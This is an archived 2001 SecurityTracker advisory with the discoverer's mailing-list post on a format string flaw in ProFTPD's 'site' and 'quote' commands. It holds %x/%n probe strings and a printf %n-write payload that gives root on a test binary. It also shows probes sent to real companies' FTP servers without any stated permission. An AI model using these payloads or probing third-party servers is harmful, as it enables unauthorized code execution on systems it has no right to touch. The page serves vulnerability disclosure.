SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
About the Archives
Want to learn about the SecurityTracker archives? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (File Transfer)  >  ProFTPD Vendors:  ProFTPd.net
ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
Date:  Aug 4 2001 03:23 (UTC/GMT)
Impact:  Execution of arbitrary code via network, User access via network
Version(s): 1.2.1-2wl and some prior versions
Description:  A vulnerability has been reported in ProFTPD that may allow a remote user with authorized FTP access (incluing anonymous access) to execute arbitrary code on the server with the privileges of the server. The author of the report indicates that this vulnerability may affect other FTP servers.

The format string vulnerability can reportedly be triggered via the 'site' command and the 'quote' command.

The 'site' command bug reportedly affects ProFTPD 1.2.1-2wl Server (Redhat) [7.1]

The 'quote' command bug reportedly affects the following versions:

ProFTPD 1.2.0pre10 Server (Debian) [orange],
ProFTPD 1.2.0rc2-1kr2 (Redhat) [7.0],
ProFTPD 1.2.1-2wl Server (Redhat) [7.1],

A remote user can use the following type of command to trigger the vulnerability:

site AAAA%x%x%x%x%x%x%x%x%x%x
quote AAAA%x%x%x%x%x%x%x%x%x%x

The vendor has been notified.

This vulnerability is reportedly the same or similar to the Wu-FTP site command exec vulnerability (that was previously reported).

The author reports that other FTP servers may also be affected.
Impact:  A remote user with authorized FTP access (incluing anonymous access) may be able to execute arbitrary code on the server with the privileges of the server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.proftpd.net (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  "you dong-hun" <szoahc@hotmail.com>
Message History:   None.

 Source Message Contents
Date:  Thu, 02 Aug 2001 10:41:41 -0400
From:  "you dong-hun" <szoahc@hotmail.com>
Subject:  hey~ new!! remote format string bug...

 

 Remote format string attack driving that use FTPD "site" instruction and 
"quote" instruction.
                                                                  - 
Discoverer: Xpl017Elz (korean) -

 site command bug: 
 Version that test directly: ProFTPD 1.2.1-2wl Server (Redhat) [7.1],
                             Most server that "site" excution of an 
instruction is possible in ftp.

 quote command bug:
 Version that test directly: ProFTPD 1.2.0pre10 Server (Debian) [orange], 
                             ProFTPD 1.2.0rc2-1kr2 (Redhat) [7.0],
                             ProFTPD 1.2.1-2wl Server (Redhat) [7.1],
                             FTP server (Version 6.5/OpenBSD)
                             Most server that "quote" excution of an 
instruction is possible in ftp.

 [x82@www tmp]$ ./bugtestfile
 input: AAAA%x%x%x%x
 output: AAAA414141417825782578257825a <--- Format string stored stack area 
through this part 
 is appeared.

 [x82@www tmp]$
 [x82@www tmp]$ (printf 
"\x41\x41\x41\x41\x9c\xf2\xff\xbf\x41\x41\x41\x41\x9e\xf2\xff\xbf%%64848c%%n%%49823c%%n";ca
t) 
| ./bugtestfile 
 
                                       ...
                                            ...                             
  A

                                                 ...      Omission      ... 
            

                                                          ...               
 

                                                              ...  

 whoami
 root
 id
 uid=999(x82) gid=999(x82) euid=0(root) groups=999(x82),10(wheel) 

 Is scene that acquire root authority using this diet most Format string 
attack.
 Already, Format string attack limitation that use "Site exec" instruction 
in wu-ftpd announced.


 Limitation of writer did not exist and tried TEST to other ftp.
 By the result,

 bash-2.04$ ftp 127.0.0.1
 Connected to 127.0.0.1.
 220 BCB1COOL Server (FORMAT STRING BUG SERVER) [xxx.bugserver.com]
 500 AUTH not understood.
 500 AUTH not understood.
 KERBEROS_V4 rejected as an authentication type
 Name (127.0.0.1:x82): x82
 331 Password required for x82.
 Password:
 230 User x82 logged in.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> site AAAA%x%x%x%x%x%x%x%x%x%x
 500 'SITE 
AAAA806C1A527FA805164828057650BFFFE9C4BFFFC190455449534141412025782541' not 
understood.
 414141 ~ this ninth was displayed.
 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 AAAA806C1A627FF805164828057650BFFFE9C4BFFFC190414141417825782578257825 
not understood.
 41414141 was displayed in eighth.
 ftp>   
 ftp> site AAAA%x%x%x%x%x%x%x%x%n <--- Use %n pointer coredump had 
happened.
 Segmentation fault (core dumped)
 bash-2.04$                
 bash-2.04$ cat /etc/redhat-release
 WOWLiNUX Release 7.1 (Paran)
 bash-2.04$ uname -a
 Linux xxx.bugserver.com 2.4.2-2wl #1 Thu Mar 16 05:21:58 KST 2001 i686 
unknown
 bash-2.04$  
 bash-2.04$ file core
 core: ELF 32-bit LSB core file of 'ftp' (signal 11), Intel 80386, version 
1, from 'ftp'

 Normal case:

 ftp> site AAAA%x%x%x%x%x%x%x%x%x%n
 ftp> 500 'SITE AAAA%X%X%X%X%X%X%X%X%X%n' not understood.
              
 Ftp server that show this result is no limitation.

 eggshell address: 0xbffffa28
 
 ex> quote 
\....................%8x%8x%8x%8x%8x%8x%8x%8x..............%n....................%n

 ex> site 
"\....................%8x%8x%8x%8x%8x%8x%8x%8x%8x...........%n....................%n"


 uname -a
 Linux xxx.bugserver.com 2.4.2-2wl #1 Thu Mar ...
 whoami
 root
 id
 uid=0(root) gid=0(root) groups=0(root)

 Ditto result may be possible though follow next time condition.

 1. Must find position of address that want to overwrite. That is, return 
address 
 2. Must calculate shellcode's address that fly.
 3. On the whole necessary calculation. That is, offer condition that 
format string can consist.

 If is server that operate FTP, most seem to have this limitation almost.
 Tried each test to domestic some company.

 netian.com 

 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 
AAAA7800BBAA10072B81008820056F3E84141414178257825782578257825782578257825 
not understood.
 
 dreamwiz.com
 
 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 
AAAA7800BBAA10072B81008820056F3E84141414178257825782578257825782578257825 
not understood.

 nbci.com

 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 
'AAAA7800BBAA10072B81008820056F3E84141414178257825782578257825782578257825': 
command not understood.

 Place that limitation is detected seems to exist much.
 Is state that problem happens and is discontinuing work in environment 
fairly to do exploit.
 Did not complete exploit up to now.It gives to other hacker who have 
ability perhaps.
 Although this limitation is executed if use ftp in windows present, what 
linux, 
 gouge and place that do not pass existed.

 It is same with wu-ftp that format string limitation exists.
 Must come out someone does plan or security supremacy as quickly as 
possible accordingly before exploit summer period.

 Because I am not an American, do not well English.
 Thank to all quantitys that read till now painfully. :-)



_________________________________________________________________
MSN Explorer°¡ ÀÖÀ¸¸é Hotmail »ç¿ëÀÌ ÈξÀ Æí¸®ÇØ Áý´Ï´Ù.<br>Áö±Ý 
http://explorer.msn.co.kr/¿¡¼­ ¹«·á·Î ´Ù¿î·ÎµåÇϼ¼¿ä.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2001, SecurityGlobal.net LLC